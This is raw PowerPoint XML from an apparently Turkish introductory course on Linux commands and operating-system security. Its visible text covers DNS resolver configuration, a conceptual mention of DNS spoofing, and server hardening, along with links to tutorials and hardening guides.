              <a:t> anahtar kelimesi ile başlayan bir satır bulunur. Bu satır, DNS sorguları için arama alanı olarak kullanılacak bir alan adını belirtir. Yukarıdaki örnekte, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> arama alanı olarak belirtilmiştir.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Daha sonra, bir veya daha fazla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nameserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> satırı bulunur. Bu satırlar, DNS sorguları için kullanılacak DNS sunucularının IP adreslerini belirtir. Yukarıdaki örnekte, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.8.8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.4.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> IP adresleri, Google Public DNS sunucularıdır.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Bir hacker, bu dosyayı kullanarak hedef sistemdeki DNS ayarlarını öğrenebilir ve bu bilgileri bir saldırı için kullanabilir.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Örneğin, bir hacker, hedef sistemin DNS ayarlarını değiştirerek kullanıcıların kötü amaçlı web sitelerine yönlendirilmesini sağlayabilir. Ayrıca, DNS ayarlarını değiştirerek kullanıcılara sahte web sayfaları sunarak, kullanıcıların kimlik bilgilerini veya diğer hassas bilgilerini çalmaya çalışabilirler.</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1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1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bunun yanı sıra, bir hacker, DNS ayarlarını değiştirerek bir "DNS spoofing" saldırısı da gerçekleştirebilir. Bu saldırıda, hacker, hedef sistemdeki DNS sunucusuna ait sahte bir DNS sunucusu kurarak, kullanıcıların istedikleri web sitesine erişmelerini engelleyebilir ve sahte web sitelerine yönlendirebilir.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">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9df184e96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9df184e960_0_232:notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486400" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="188038"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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152275" y="79650"/>
            <a:ext cx="7848300" cy="434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7" name="Google Shape;17;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152280" y="685800"/>
            <a:ext cx="7391100" cy="40572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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="79650"/>
            <a:ext cx="7848300" cy="434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20" name="Google Shape;20;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152280" y="685800"/>
            <a:ext cx="36069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21" name="Google Shape;21;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3939840" y="685800"/>
            <a:ext cx="36069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152275" y="79650"/>
            <a:ext cx="7848300" cy="4344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 name="Google Shape;26;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242950" y="727125"/>
            <a:ext cx="8753700" cy="3970200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC"/>
          </a:solidFill>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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25650" y="4857850"/>
            <a:ext cx="9220500" cy="3399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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25650" y="-76450"/>
            <a:ext cx="9195000" cy="647400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E34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152275" y="79650"/>
            <a:ext cx="7848300" cy="434400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFF2CC"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFF2CC"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFF2CC"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFF2CC"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFF2CC"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFF2CC"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFF2CC"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFF2CC"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;13;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152280" y="685800"/>
            <a:ext cx="7391100" cy="4057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mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="13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truelist.co/blog/linux-statistics/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId5"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hyperlink" Target="https://www.pluralsight.com/blog/it-ops/linux-hardening-secure-server-checklist" TargetMode="Externa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52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pluralsight.com/blog/it-ops/linux-hardening-secure-server-checklist"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hyperlink" Target="https://trends.google.com/trends/hottrends/visualize?nrow=5&amp;ncol=5" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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hyperlink" Target="https://jaguhiremath62.medium.com/difference-between-kernel-and-shell-718b3de15be6"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jaguhiremath62.medium.com/difference-between-kernel-and-shell-718b3de15be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www.serverkaka.com/2018/01/key-locations-in-linux-file-system_21.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9.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fahmifj.github.io/blog/linux-backdoors-and-where-to-find-them/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pluralsight.com/blog/it-ops/linux-hardening-secure-server-checklis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hyperlink" Target="https://contabo.com/blog/a-practical-guide-to-superuser-accounts-sudo-root/"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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxopsys.com/topics/linux-file-permissions" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freecodecamp.org/news/linux-chmod-chown-change-file-permissions/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId7"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gif"/><Relationship Id="rId4"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17.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://education.arcus.chop.edu/linux-cli/" TargetMode="External"/><Relationship Id="rId5"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s://colab.research.google.com/drive/1sEU3TVLgIWPjLX_z9F2XgbNBir05al_q?usp=sharing" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://colab.research.google.com/drive/1sEU3TVLgIWPjLX_z9F2XgbNBir05al_q?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cmdchallenge.com/" TargetMode="External"/><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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://education.arcus.chop.edu/linux-cli/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:bandit@bandit.labs.overthewire.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s://docs.google.com/document/d/1g88NfTV07JgV87erO61W0gs3yoDpvytwyotKUlMYVmU/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1g88NfTV07JgV87erO61W0gs3yoDpvytwyotKUlMYVmU/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1g88NfTV07JgV87erO61W0gs3yoDpvytwyotKUlMYVmU/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:bandit@bandit.labs.overthewire.org" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1g88NfTV07JgV87erO61W0gs3yoDpvytwyotKUlMYVmU/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId8"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www.youtube.com/watch?v=Q07PhW5sCEk" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=Q07PhW5sCEk"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hyperlink" Target="https://www.stratosphereips.org/blog/2020/10/22/a-visual-display-of-etcpasswd-andetcshadow"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21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.stratosphereips.org/blog/2020/10/22/a-visual-display-of-etcpasswd-andetcshadow"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9.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hyperlink" Target="https://www.bell-labs.com/usr/dmr/www/picture.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25.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://devrant.com/rants/1590451/and-this-ladies-and-gentlemen-is-a-fork-bomb-in-2018-thanks-wikipedia"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www.wallarm.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-them/"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28.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-them/"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hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-them/"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30.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-them/"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33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-them/"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23.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-the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s://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-the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s://www.gnu.org/philosophy/open-source-misses-the-point.tr.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tr.wikipedia.org/wiki/Richard_Stallma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34.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-the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fahmifj.github.io/blog/linux-backdoors-and-where-to-find-them/"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35.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-the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hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-them/"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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-the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41.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fahmifj.github.io/blog/linux-backdoors-and-where-to-find-them/"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42.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sansorg.egnyte.com/dl/AvZo1dS7kI" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sansorg.egnyte.com/dl/AvZo1dS7kI" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sansorg.egnyte.com/dl/EDP6XtXMOh" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sansorg.egnyte.com/dl/OmZRZGy0uT" TargetMode="External"/><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48.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/bltf146e4f361db3938/5e34a7bc946d717e2eab6139/power-shell-cheat-sheet-v41.pdf?msc=Cheat+Sheet+Blog" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sans.blue/Tools/pdfs/PowerShell.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/bltf146e4f361db3938/5e34a7bc946d717e2eab6139/power-shell-cheat-sheet-v41.pdf?msc=Cheat+Sheet+Blog" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/bltf146e4f361db3938/5e34a7bc946d717e2eab6139/power-shell-cheat-sheet-v41.pdf?msc=Cheat+Sheet+Blog" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/bltea7de5267932e94b/5eb08aafcf88d36e47cf0644/Cheatsheet_SEC301-401_R7.pdf" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sans.blue/Tools/pdfs/PowerShell.pdf"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44.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mhzawadi/homebrew-cbonsai"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hyperlink" Target="https://www.ifsecglobal.com/physical-security/why-securing-physical-servers-is-crucial-for-data-protection/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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hyperlink" Target="https://www.pluralsight.com/blog/it-ops/linux-hardening-secure-server-checklist" TargetMode="External"/><Relationship Id="rId4"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50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pluralsight.com/blog/it-ops/linux-hardening-secure-server-checklist"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45.jpg"/><Relationship Id="rId4"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hyperlink" Target="https://www.pluralsight.com/blog/it-ops/linux-hardening-secure-server-checklist"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hyperlink" Target="https://www.pluralsight.com/blog/it-ops/linux-hardening-secure-server-checklist"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 name="Shape 31"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;32;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="575850"/>
            <a:ext cx="9144000" cy="4255200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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rPr b="1" lang="en-US" sz="3400"/>
              <a:t>Linux Temel Komutlar,</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3400"/>
              <a:t>İşletim Sistemi Güvenliği</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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1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En sık kullanılan linux dağıtımları</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p1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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://truelist.co/blog/linux-statistics/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Google Shape;98;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="666450"/>
            <a:ext cx="4179375" cy="4012200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99" name="Google Shape;99;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4484175" y="666450"/>
            <a:ext cx="4507425" cy="2298787"/>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43" name="Shape 843"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="Google Shape;844;p10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Gereksiz servisleri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kapat</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="845" name="Google Shape;845;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676350" y="679925"/>
            <a:ext cx="4363500" cy="4151100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="09060F"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
